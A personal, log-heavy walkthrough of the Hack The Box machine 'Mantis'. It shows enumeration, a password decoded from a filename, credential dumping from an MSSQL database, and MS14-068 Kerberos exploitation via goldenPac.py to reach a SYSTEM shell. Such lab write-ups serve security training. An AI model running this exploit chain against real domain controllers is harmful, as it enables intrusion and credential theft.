nmap scan
└─$ nmap -sV -sC -oA mantis 10.10.10.52 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 22:55 EDT
Nmap scan report for 10.10.10.52
Host is up (0.34s latency).
Not shown: 981 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-18 02:56:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open @�EfV Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.10.52:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2023-09-18T02:57:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-09-18T02:43:16
|_Not valid after: 2053-09-18T02:43:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Tossed Salad – Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|clock-skew: mean: 48m00s, deviation: 1h47m21s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
| System time: 2023-09-17T22:57:31-04:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-18T02:57:32
|_ start_date: 2023-09-18T02:43:09
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.80 seconds
adding the domain to the hosts file
GNU nano 7.2 /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.169 megabank.local resolute.megabank.local
10.10.10.52 htb.local mantis.htb.local
ldapsearch
naming context
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ ldapsearch -x -H ldap://10.10.10.52 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
searching for valid usernames. no luck
APv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v1db1
# numResponses: 1
┌──(kali㉿kali)-[~/HTB/mantis]
└─$
smbclient but no luck
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbclient -L //10.10.10.52
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbclient -L //10.10.10.52 -N -U%
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbmap -H 10.10.10.52
Try rpcclient with two options
rpcclient -U '' 10.10.10.52 - blank usersanem
--
rpcclient -U '' -N 10.10.10.52 --> with blank username but do not ask for password
└─$ rpcclient -U '' 10.10.10.52 Password for [WORKGROUP\]: Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE ┌──(kali㉿kali)-[~/HTB/mantis] └─$ rpcclient -U '' -N 10.10.10.52 rpcclient
gt;
will try sone rpcclient commands - no permissionsresult was NT_STATUS_ACCESS_DENIED rpcclient
gt; querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclientgt; enumdomgroups
result was NT_STATUS_ACCESS_DENIED
GetNPusers└─$ ./GetNPUsers.py -dc-ip 10.10.10.192 -request 'htb.local/' ┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples] └─$ ldapsearch -x -H ldap://10.10.10.52 -b 'DC=htb,DC=local' -s sub # extended LDIF # # LDAPv3 # base <DC=htb,DC=local> with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v1db1 # numResponses: 1 ┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples] └─$
passoword policy
┌──(kali㉿kali)-[~] └─$ crackmapexec smb 10.10.10.52 --pass-pol SMB 10.10.10.52 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) ┌──(kali㉿kali)-[~]
tried sqlclient
└─$ ./mssqlclient.py [email protected] -windows-auth Impacket v0.11.0 - Copyright 2023 Fortra Password: [*] Encryption required, switching to TLS [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication. ┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
Tried enumerating 10.10.10.52:8080 with go buster but did not get anything after i tried each end point
gobuster dir -u http://10.10.10.52:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
out of the rabit hole
Tried to do a full nmap scan but it kept failing before completion
nmap -p- -T4 -oA full 10.10.10.52 -Pn
Got a hint that port 1337 is open so just did a direct scan to the port
'┌──(kali㉿kali)-[~/HTB/mantis] └─$ nmap -p 1337 10.10.10.52 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 18:09 EDT Nmap scan report for htb.local (10.10.10.52) Host is up (0.34s latency). PORT STATE SERVICE 1337/tcp open waste Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds'
we can open a web page with - http://10.10.10.52:1337/
Enumerating this with gobuster
gobuster dir -u http://10.10.10.52:1337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
i also ran the same with ffuf to see if it gets anything faster
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/FUZZ
FFUF is definately much faster and gave me a result much quicker. WIll be using it
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/FUZZ /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.10.52:1337/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 339ms] * FUZZ: # Copyright 2007 James Fisher [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms] * FUZZ: # or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms] * FUZZ: # on atleast 2 different hosts [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms] * FUZZ: # [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms] * FUZZ: [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms] * FUZZ: # This work is licensed under the Creative Commons [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms] * FUZZ: # [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 344ms] * FUZZ: # license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 344ms] * FUZZ: # Priority ordered case sensative list, where entries were found [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 345ms] * FUZZ: # Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 345ms] * FUZZ: # Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms] * FUZZ: # [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms] * FUZZ: # directory-list-2.3-medium.txt [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms] * FUZZ: # [Status: 500, Size: 3026, Words: 683, Lines: 73, Duration: 617ms] * FUZZ: orchard [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 340ms] * FUZZ: [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 347ms] * FUZZ: secure_notes
found this file
http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt 1. Download OrchardCMS 2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database 3. Launch IIS and add new website and point to Orchard CMS folder location. 4. Launch browser and navigate to http://localhost:8080 5. Set admin password and configure sQL server connection string. 6. Add blog pages with admin user.
from chatGPT
The string "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" appears to be encoded in Base64 format. Base64 is a group of binary-to-text encoding schemes that represent binary data in an ASCII string format. To determine its original content, you would need to decode it from Base64.
decoding it and then converting the hex to asci
└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d 6d2424716c5f53405f504073735730726421 ┌──(kali㉿kali)-[~/Downloads] └─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -r -p m$ql_S@_P@ssW0rd! ┌──(kali㉿kali)-[~/Downloads] └─$
we are going to try and connect to the sql database with the admin credentials using mssqclient.py
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples] └─$ ./mssqlclient.py admin:'m$ql_S@_P@ssW0rd!'@10.10.10.52 Impacket v0.11.0 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (120 7208) [!] Press help for extra shell commands SQL (admin admin@master)>
some commands to interact with the sql
To list all databases - SELECT name FROM sys.databases; To switch to a specific database (replace `YourDatabaseName` with the actual database name): USE YourDatabaseName; Once you're inside a specific database, to list all tables: SELECT name FROM sys.tables; To see the columns of a specific table (replace `YourTableName` with the actual table name): SELECT column_name, data_type, character_maximum_length FROM information_schema.columns WHERE table_name = 'YourTableName';
Looking for usernames
SQL (admin admin@master)> USE master; [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'. SQL (admin admin@master)> SELECT name, type_desc FROM sys.server_principals WHERE type IN ('U', 'G', 'S'); name type_desc ----- --------- sa SQL_LOGIN admin SQL_LOGIN
recommendation from chatGPT
**User and Role Information**: - `blog_Orchard_Users_UserPartRecord`: This might contain user-specific information.
To fetch all columns from this table
SELECT * FROM blog_Orchard_Users_UserPartRecord;
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Incorrect syntax near the keyword 'WHERE'. SQL (admin admin@orcharddb)> SELECT * FROM blog_Orchard_Users_UserPartRecord; Id UserName Email NormalizedUserName Password PasswordFormat HashAlgorithm PasswordSalt RegistrationStatus EmailStatus EmailChallengeToken CreatedUtc LastLoginUtc LastLogoutUtc -- -------- --------------- ------------------ -------------------------------------------------------------------- -------------- ------------- ------------------------ ------------------ ----------- ------------------- ------------------- ------------------- ------------------- 2 admin admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== Hashed PBKDF2 UBwWF1CQCsaGc/P7jIR/kg== Approved Approved NULL 2017-09-01 13:44:01 2017-09-01 14:03:50 2017-09-01 14:06:31 15 James [email protected] james J@m3s_P@ssW0rd! Plaintext Plaintext NA Approved Approved NULL 2017-09-01 13:45:44 NULL NULL SQL (admin admin@orcharddb)>
we can see a user [email protected] and password J@m3s_P@ssW0rd!
Trying crackmapexec with this
┌──(kali㉿kali)-[~/HTB/mantis] └─$ crackmapexec smb 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!' SMB 10.10.10.52 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) SMB 10.10.10.52 445 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd! ┌──(kali㉿kali)-[~/HTB/mantis] └─$ crackmapexec smb 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!' --shares SMB 10.10.10.52 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) SMB 10.10.10.52 445 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd! SMB 10.10.10.52 445 MANTIS [+] Enumerated shares SMB 10.10.10.52 445 MANTIS Share Permissions Remark SMB 10.10.10.52 445 MANTIS ----- ----------- ------ SMB 10.10.10.52 445 MANTIS ADMIN$ Remote Admin SMB 10.10.10.52 445 MANTIS C$ Default share SMB 10.10.10.52 445 MANTIS IPC$ Remote IPC SMB 10.10.10.52 445 MANTIS NETLOGON READ Logon server share SMB 10.10.10.52 445 MANTIS SYSVOL READ Logon server share
trying winrm but this fails
┌──(kali㉿kali)-[~/HTB/mantis] └─$ crackmapexec winrm 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!' ┌──(kali㉿kali)-[~/HTB/mantis] └─$ evil-winrm -i 10.10.10.52 -u ryan -p 'J@m3s_P@ssW0rd!' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.52" port 5985 (10.10.10.52:5985) Error: Exiting with code 1 ┌──(kali㉿kali)-[~/HTB/mantis]
trying rpcclient
Password for [WORKGROUP\james]: rpcclient
gt; enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclientgt; querydispinfo
index: 0xdea RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xea6 RID: 0x44f acb: 0x00000210 Account: james Name: James Desc: (null)
index: 0xe19 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
rpcclientgt; enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]
rpcclientgt; queryuser james
User Name : james
Full Name : James
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : Sun, 24 Dec 2017 09:39:48 EST
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 13 Sep 30828 22:48:05 EDT
Password last set Time : Thu, 31 Aug 2017 20:12:02 EDT
Password can change Time : Fri, 01 Sep 2017 20:12:02 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x44f
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
getting RID for jamesjames S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1) rpcclient
gt;
checking netlogon and sysvol. There was nothing in netlogon
─$ smbclient \\10.10.10.52\SYSVOL -U james%J@m3s_P@ssW0rd!
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Thu Aug 31 20:05:10 2017
.. D 0 Thu Aug 31 20:05:10 2017
htb.local Dr 0 Thu Aug 31 20:05:10 20175217023 blocks of size 4096. 938803 blocks available
smb: > cd htb.local
smb: \htb.local> ls
. D 0 Thu Aug 31 20:06:29 2017
.. D 0 Thu Aug 31 20:06:29 2017
DfsrPrivate DHSr 0 Thu Aug 31 20:06:29 2017
Policies D 0 Thu Aug 31 20:05:19 2017
scripts D 0 Thu Aug 31 20:05:10 20175217023 blocks of size 4096. 938803 blocks available
smb: \htb.local> cd scripts
smb: \htb.local\scripts> ls
. D 0 Thu Aug 31 20:05:10 2017
.. D 0 Thu Aug 31 20:05:10 20175217023 blocks of size 4096. 938803 blocks available
smb: \htb.local\scripts> cd ../
smb: \htb.local> cd DfsrPrivate
cd \htb.local\DfsrPrivate: NT_STATUS_ACCESS_DENIED
smb: \htb.local> cd Policies
smb: \htb.local\Policies> ls
. D 0 Thu Aug 31 20:05:19 2017
.. D 0 Thu Aug 31 20:05:19 2017
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Thu Aug 31 20:05:19 2017
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Thu Aug 31 20:05:19 2017downloaded the registry.pol file localy ```bash └─$ smbclient \\\\10.10.10.52\\SYSVOL -U james%J@m3s_P@ssW0rd! Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Aug 31 20:05:10 2017 .. D 0 Thu Aug 31 20:05:10 2017 htb.local Dr 0 Thu Aug 31 20:05:10 2017 5217023 blocks of size 4096. 938803 blocks available smb: \> cd htb.local smb: \htb.local\> ls . D 0 Thu Aug 31 20:06:29 2017 .. D 0 Thu Aug 31 20:06:29 2017 DfsrPrivate DHSr 0 Thu Aug 31 20:06:29 2017 Policies D 0 Thu Aug 31 20:05:19 2017 scripts D 0 Thu Aug 31 20:05:10 2017 5217023 blocks of size 4096. 938803 blocks available smb: \htb.local\> cd scripts smb: \htb.local\scripts\> ls . D 0 Thu Aug 31 20:05:10 2017 .. D 0 Thu Aug 31 20:05:10 2017 5217023 blocks of size 4096. 938803 blocks available smb: \htb.local\scripts\> cd ../\ smb: \htb.local\> cd DfsrPrivate cd \htb.local\DfsrPrivate\: NT_STATUS_ACCESS_DENIED smb: \htb.local\> cd Policies smb: \htb.local\Policies\> ls . D 0 Thu Aug 31 20:05:19 2017 .. D 0 Thu Aug 31 20:05:19 2017 {31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Thu Aug 31 20:05:19 2017 {6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Thu Aug 31 20:05:19 2017 5217023 blocks of size 4096. 938803 blocks available smb: \htb.local\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9} smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls . D 0 Thu Aug 31 20:05:19 2017 .. D 0 Thu Aug 31 20:05:19 2017 GPT.INI A 22 Thu Aug 31 20:08:27 2017 MACHINE D 0 Thu Aug 31 20:08:27 2017 USER D 0 Thu Aug 31 20:05:19 2017 cd 5217023 blocks of size 4096. 939173 blocks available smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd USER smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls . D 0 Thu Aug 31 20:05:19 2017 .. D 0 Thu Aug 31 20:05:19 2017 cd 5217023 blocks of size 4096. 939173 blocks available smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd MACHINE cd \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\MACHINE\: NT_STATUS_OBJECT_NAME_NOT_FOUND smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls . D 0 Thu Aug 31 20:05:19 2017 .. D 0 Thu Aug 31 20:05:19 2017 cd 5217023 blocks of size 4096. 939173 blocks available smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd ../ smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls . D 0 Thu Aug 31 20:08:27 2017 .. D 0 Thu Aug 31 20:08:27 2017 Microsoft D 0 Thu Aug 31 20:05:19 2017 Registry.pol A 2782 Thu Aug 31 20:08:27 2017 5217023 blocks of size 4096. 939173 blocks available smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> get Registry.pol getting file \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2782 as Registry.pol (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec) smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\>
Usin polenum to analyse. Gave up. rabbit hole. looked for hints
The RID that we got before will be useful
the machine is vulnerable to ms14-068
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
usage
USAGE: ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
┌──(kali㉿kali)-[~/Downloads] └─$ wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/pykek/ms14-068.py --2023-09-22 08:51:17-- https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/pykek/ms14-068.py Resolving github.com (github.com)... 20.248.137.48 Connecting to github.com (github.com)|20.248.137.48|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 46695 (46K) [text/plain] Saving to: ‘ms14-068.py’ ms14-068.py 100%[=================================================>] 45.60K --.-KB/s in 0.08s 2023-09-22 08:51:18 (552 KB/s) - ‘ms14-068.py’ saved [46695/46695] ┌──(kali㉿kali)-[~/Downloads] └─$ cp ms14-068.py ~/HTB/mantis ┌──(kali㉿kali)-[~/Downloads]
the user id we got from above in previous step using rpcclient
rpcclient
gt;lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
rpcclientgt;
we run this script which kept failing numerous times and i beleive because i am using python 3 and its meant for 2. even when i tried 2.7 it kept failing.will try this later with kali2018┌──(kali㉿kali)-[~/HTB/mantis] └─$ python2.7 ms14-068.py -u [email protected] -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103 Traceback (most recent call last): File "ms14-068.py", line 17, in <module> from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache ImportError: No module named kek.ccache ┌──(kali㉿kali)-[~/HTB/mantis] └─$ python ms14-068.py -u [email protected] -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103 File "/home/kali/HTB/mantis/ms14-068.py", line 149 print 'ERROR:', e ^^^^^^^^^^^^^^^^^ SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)? ┌──(kali㉿kali)-[~/HTB/mantis] └─$ python2 ms14-068.py -u [email protected] -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103 Traceback (most recent call last): File "ms14-068.py", line 17, in <module> from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache ImportError: No module named kek.ccache ┌──(kali㉿kali)-[~/HTB/mantis] └─$
tried goldenPac.py
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples] └─$ ./goldenPac.py htb.local/james:J@m3s_P@ssW0rd\[email protected] Impacket v0.11.0 - Copyright 2023 Fortra [*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103 [*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657 [*] Attacking domain controller mantis.htb.local [*] mantis.htb.local found vulnerable! [*] Requesting shares on mantis.htb.local..... [*] Found writable share ADMIN$ [*] Uploading file gHZVxsPx.exe [*] Opening SVCManager on mantis.htb.local..... [*] Creating service VAjq on mantis.htb.local..... [*] Starting service VAjq..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>^[[A^[[A
\>cd users C:\Users>cd admi b'The system cannot find the path specified.\r\n' C:\Users>cd administrator C:\Users\Administrator>cd desktop C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 3292-4936 Directory of C:\Users\Administrator\Desktop 02/08/2021 01:44 PM <DIR> . 02/08/2021 01:44 PM <DIR> .. 09/22/2023 09:36 AM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 3,841,724,416 bytes free C:\Users\Administrator\Desktop>type root.txt ccada3f6a7bfe7c33068a653a56c51de C:\Users\Administrator\Desktop>